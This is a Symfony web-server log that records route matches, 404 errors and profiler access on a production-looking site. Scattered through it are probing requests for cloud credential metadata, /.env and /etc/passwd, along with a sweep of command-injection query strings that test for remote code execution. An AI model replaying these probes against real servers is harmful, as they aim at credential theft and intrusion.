[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-17 04:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
[2025-12-17 04:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:46:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=time","method":"GET"} []
[2025-12-17 04:46:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 04:49:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 04:52:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=security","method":"GET"} []
[2025-12-17 04:52:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 04:53:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8252d7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8252d7","method":"GET"} []
[2025-12-17 04:53:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 04:58:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=request","method":"GET"} []
[2025-12-17 04:58:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 05:00:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
[2025-12-17 05:00:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 05:05:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=config","method":"GET"} []
[2025-12-17 05:05:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 05:05:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 05:08:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-17 05:08:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-17 05:11:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3?panel=cache","method":"GET"} []
[2025-12-17 05:11:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 05:11:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 05:11:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 05:11:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 05:11:51] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 05:11:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 05:11:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 05:11:51] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 05:12:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
[2025-12-17 05:12:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-17 05:12:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 05:12:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 05:12:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 05:12:52] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 05:12:52] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 05:12:52] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 05:12:52] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 05:18:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 05:19:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b02ab3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b02ab3","method":"GET"} []
[2025-12-17 05:19:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 05:24:59] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
[2025-12-17 05:24:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-17 05:27:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=twig","method":"GET"} []
[2025-12-17 05:27:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 05:28:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
[2025-12-17 05:28:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
[2025-12-17 05:29:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=cache","method":"GET"} []
[2025-12-17 05:29:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 05:30:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 05:34:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6b7869","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6b7869?panel=request","method":"GET"} []
[2025-12-17 05:34:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 05:34:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=time","method":"GET"} []
[2025-12-17 05:34:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 05:41:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4ae85","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b4ae85?panel=request","method":"GET"} []
[2025-12-17 05:41:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
